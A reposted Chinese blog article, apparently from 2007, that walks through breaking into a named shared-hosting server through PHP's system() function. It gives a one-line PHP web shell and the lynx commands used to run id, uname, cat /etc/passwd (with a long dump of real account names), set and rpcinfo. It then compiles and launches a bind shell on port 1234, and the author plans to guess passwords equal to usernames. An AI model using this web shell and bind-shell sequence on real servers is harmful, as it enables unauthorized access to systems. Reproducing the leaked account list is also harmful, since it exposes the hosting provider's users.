ITPub博客

首页 > 应用开发 > IT综合 > 构建Linux下的安全,PHP配置漏洞攻击(转)

构建Linux下的安全,PHP配置漏洞攻击(转)

原创 IT综合 作者:RegisterForBlog 时间:2007-09-19 18:42:56 0 删除 编辑
构建Linux下的安全,PHP配置漏洞攻击(转)[@more@]

  这些站点的问题主要出在允许使用system(),exec()等等这些函数,熟悉php的朋友应该知道,这些函数是调用系统指令的(虽然通过web server php程序只能有nobody权限),而且一般用户只要申请一个空间就可以获取局部的可写权限,令用户可以写一个web shell程序执行命令.在这些服务器上一般用户不能够登陆,也就是nologin(没有登陆shell,管理员可没那么"慷慨"!),这样利用system(),exec()这些函数就可以bind一个shell出来~!本文以虎翼网(www.51.net)的空间为例子(他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器):

  1.写一个webshell先(php很容易做到)

  ?>php

  #shell.php3

  echo"
";

  system("$cmd");

  echo"
";

  ?>

  2.上传到空间

  3.执行(具体的服务器马赛克处理)

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下权限到底多大)

  uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)

  root真的很吝啬啊!

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系统)

  FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20

  00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat

  /etc/passwd(shadow是铁定看不到)

  root:*:0:0:Charlie &:/root:/bin/csh

  toor:*:0:0:Bourne-again Superuser:/root:

  daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin

  operator:*:2:5:System &:/:/sbin/nologin

  bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin

  tty:*:107353:51:USER:/home/tty:/local/bin/null

  kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin

  games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

  news:*:8:8:News Subsystem:/:/sbin/nologin

  man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

  bind:*:53:53:Bind Sandbox:/:/sbin/nologin

  uucp:*:66:66:UUCP

  pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico

  xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin

  pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin

  ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin

  nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

  quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin

  quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin

  quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin

  tian:*:1002:1002::/local/tian:/local/bin/ksh

  sysadmin:*:1001:1001:System

  Administrator:/local/sysadmin:/local/bin/ksh

  test2:*:9999:51::/home/test2:/local/bin/null

  xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin

  zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null

  yes2:*:106202:51:USER:/home/yes2:/local/bin/null

  daboy:*:106203:51:USER:/home/daboy:/local/bin/null

  yesky:*:106204:51:USER:/home/yesky:/local/bin/null

  yesk:*:106205:51:USER:/home/yesk:/local/bin/null

  lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null

  fog:*:106207:51:USER:/home/fog:/local/bin/null

  renshou:*:106208:51:USER:/home/renshou:/local/bin/null

  hilen:*:106209:51:USER:/home/hilen:/local/bin/null

  hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin

  xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin

  wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null

  larry:*:106213:51:USER:/home/larry:/local/bin/null

  sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null

  everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null

  linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null

  baobao:*:106217:51:USER:/home/baobao:/local/bin/null

  chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null

  hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null

  dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null

  simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null

  chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null

  lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null

  zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null

  pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null

  startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null

  model:*:106227:51:USER:/home/model:/local/bin/null

  leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null

  fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null

  ljok:*:106230:51:USER:/home/ljok:/local/bin/null

  baorui:*:106231:51:USER:/home/baorui:/local/bin/null

  fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null

  zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null

  xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null

  zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null

  power:*:106236:51:USER:/home/power:/local/bin/null

  feefan:*:106237:51:USER:/home/feefan:/local/bin/null

  paradise:*:106238:51:USER:/home/paradise:/local/bin/null

  wulc:*:106239:51:USER:/home/wulc:/local/bin/null

  jcm:*:106240:51:USER:/home/jcm:/local/bin/null

  liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null

  jingder:*:106242:51:USER:/home/jingder:/local/bin/null

  hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null

  adai:*:106244:51:USER:/home/adai:/local/bin/null

  fightben:*:106245:51:USER:/home/fightben:/local/bin/null

  lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null

  xeno:*:106247:51:USER:/home/xeno:/local/bin/null

  ..................(太多了~省略)

  只有几个用户有shell可以登陆,cp到我的目录下面,等一下分离出usrename看看有没有人username=passwd的~呵呵~

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set

  HOME=/

  PS1=$

  OPTIND=1

  PS2=>

  PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin

  IFS=

  好差的"环境",被设置成这样....

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts

  # $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $

  #

  # Host Database

  # This file should contain the addresses and aliases

  # for local hosts that share this file.

  # In the presence of the domain name service or NIS, this file may

  # not be consulted at all; see /etc/host.conf for the resolution

  order.

  #

  #

  127.0.0.1 localhost localhost.my.domain myname.my.domain

  #

  # Imaginary network.

  #10.0.0.2 myname.my.domain myname

  #10.0.0.3 myfriend.my.domain myfriend

  #

  # According to RFC 1918, you can use the following IP networks for

  # private nets which will never be connected to the Internet:

  #

  # 10.0.0.0 - 10.255.255.255

  # 172.16.0.0 - 172.31.255.255

  # 192.168.0.0 - 192.168.255.255

  #

  #

  不算太小啊~hosts ~

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc

  (老天保佑~有gcc)

  gcc:/usr/sbin/gcc(万岁!!!!!!!!!!!!)

  我来试试看~弄一个大家伙上去,编译一下,哈哈~速度好快!

  webshell太累了,bind一个shell出来方便一点...(上传binshell程序,自己写也可以用perl/C,都不太难)

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234

  bind shell too port 1234

  telnet xxx.51.net 1234

  .....下面省略,反正就可以执行命令了

  嗯~好像这台没装MySQL,可惜~呵呵~~~~~~~~~,对了oso.com.cn的好像有~,不过最近停了.....

  lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -p

  localhost

  portmapper 100000 portmap sunrpc

  rstatd 100001 rstat rstat_svc rup perfmeter

  rusersd 100002 rusers

  nfs 100003 nfsprog

  ypserv 100004 ypprog

  mountd 100005 mount showmount

  ypbind 100007

  walld 100008 rwall shutdown

  yppasswdd 100009 yppasswd

  etherstatd 100010 etherstat

  rquotad 100011 rquotaprog quota rquota

  sprayd 100012 spray

  3270_mapper 100013

  rje_ma

  

本文来自:http://www.linuxpk.com/30598.html

-->linux电子图书免费下载和技术讨论基地

·上一篇:操作服务抵制入侵—让服务服务得更好

·下一篇:透析黑客攻击技术之渗透防火墙的Shellcode
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970146/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论